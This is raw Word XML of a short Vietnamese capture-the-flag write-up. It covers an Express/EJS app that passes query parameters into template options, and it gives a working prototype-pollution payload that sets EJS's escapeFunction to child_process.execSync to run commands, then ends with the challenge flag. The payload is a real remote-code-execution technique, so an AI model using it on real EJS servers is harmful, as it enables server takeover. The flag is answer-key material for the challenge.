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8394F" w14:textId="48372693" w:rsidR="00C50999" w:rsidRDefault="00C509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Giao diện trang web:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CFA461" w14:textId="550A55D0" w:rsidR="00C50999" w:rsidRDefault="00C5099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8AEAFA" wp14:editId="02838C26">
            <wp:extent cx="3821723" cy="327576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168" cy="32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9C53" w14:textId="77777777" w:rsidR="00C50999" w:rsidRDefault="00C50999">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00F49F41" w14:textId="0BA43F43" w:rsidR="002F49FE" w:rsidRDefault="005C6D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Bài cho source code rất đơn giản: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659DE991" w14:textId="76164653" w:rsidR="005C6DBD" w:rsidRDefault="005C6DBD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FF75CAB" w14:textId="77777777" w:rsidR="005C6DBD" w:rsidRPr="005C6DBD" w:rsidRDefault="005C6DBD" w:rsidP="005C6DBD">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C6DBD">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>require("express")()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FAAECDB" w14:textId="77777777" w:rsidR="005C6DBD" w:rsidRPr="005C6DBD" w:rsidRDefault="005C6DBD" w:rsidP="005C6DBD">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C6DBD">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  .set("view engine", "ejs")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4D5425" w14:textId="77777777" w:rsidR="005C6DBD" w:rsidRPr="005C6DBD" w:rsidRDefault="005C6DBD" w:rsidP="005C6DBD">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C6DBD">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  .use((req, res) =&gt; res.render("index", { blob: "blob", ...req.query }))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F94D882" w14:textId="695ABC0F" w:rsidR="005C6DBD" w:rsidRPr="005C6DBD" w:rsidRDefault="005C6DBD" w:rsidP="005C6DBD">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C6DBD">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  .listen(3000);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58ED6C7B" w14:textId="27678D24" w:rsidR="005C6DBD" w:rsidRDefault="005C6DBD" w:rsidP="005C6DBD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17EB8467" w14:textId="397C96CE" w:rsidR="00297C87" w:rsidRPr="00C50999" w:rsidRDefault="00297C87" w:rsidP="005C6DBD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Challenge tương tự: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C50999">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>https://vozec.fr/writeups/peculiar-caterpillar/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB2406A" w14:textId="6D4498A2" w:rsidR="00297C87" w:rsidRPr="00C50999" w:rsidRDefault="00297C87" w:rsidP="005C6DBD">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99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Giải thích chi tiết: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C50999">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>https://mizu.re/post/ejs-server-side-prototype-pollution-gadgets-to-rce#final_poc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA07948" w14:textId="5659B7DD" w:rsidR="00C50999" w:rsidRDefault="00C50999" w:rsidP="005C6DBD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17C37AE8" w14:textId="230F6686" w:rsidR="00C50999" w:rsidRDefault="00C50999" w:rsidP="005C6D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Payload: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C50999">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/?</w:t>
      </w:r>
      <w:r w:rsidRPr="00C50999">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>debug=true&amp;settings[view options][client]=true&amp;settings[view options][escapeFunction]=global.process.mainModule.require('child_process').execSync;//&amp;blob=id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FCA332" w14:textId="3C0D748E" w:rsidR="00297C87" w:rsidRDefault="00297C87" w:rsidP="005C6DBD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B3D38AF" w14:textId="3948E25A" w:rsidR="00297C87" w:rsidRDefault="00C50999" w:rsidP="005C6D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F749AA" wp14:editId="13AE5C16">
            <wp:extent cx="5943600" cy="2754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68D1" w14:textId="4261F6C3" w:rsidR="00C50999" w:rsidRDefault="00C50999" w:rsidP="005C6DBD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="434472B4" w14:textId="7CD8AFB8" w:rsidR="00C50999" w:rsidRPr="00000440" w:rsidRDefault="00000440" w:rsidP="005C6DBD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00000440">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Flag: </w:t>
      </w:r>
      <w:r w:rsidRPr="00000440">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CACI{bl0b_s4y_pl3453l00k0utf0rpr0707yp3p0llut10n}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDA26B9" w14:textId="0F0C4ADF" w:rsidR="00000440" w:rsidRDefault="00000440" w:rsidP="005C6DBD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65A1014F" w14:textId="77777777" w:rsidR="00000440" w:rsidRPr="005C6DBD" w:rsidRDefault="00000440" w:rsidP="005C6DBD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00000440" w:rsidRPr="005C6D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F79"/>
    <w:rsid w:val="00000440"/>
    <w:rsid w:val="00297C87"/>
    <w:rsid w:val="002F49FE"/>
    <w:rsid w:val="004A5F79"/>
    <w:rsid w:val="00593684"/>
    <w:rsid w:val="005C6DBD"/>
    <w:rsid w:val="00637730"/>
    <w:rsid w:val="00BD107F"/>
    <w:rsid w:val="00C5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0CE393"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{0C0CFF86-A748-DF43-A602-ECDA11813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2024-09-29T04:21:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-09-29T04:34:00Z</dcterms:modified>
</cp:coreProperties>
</file>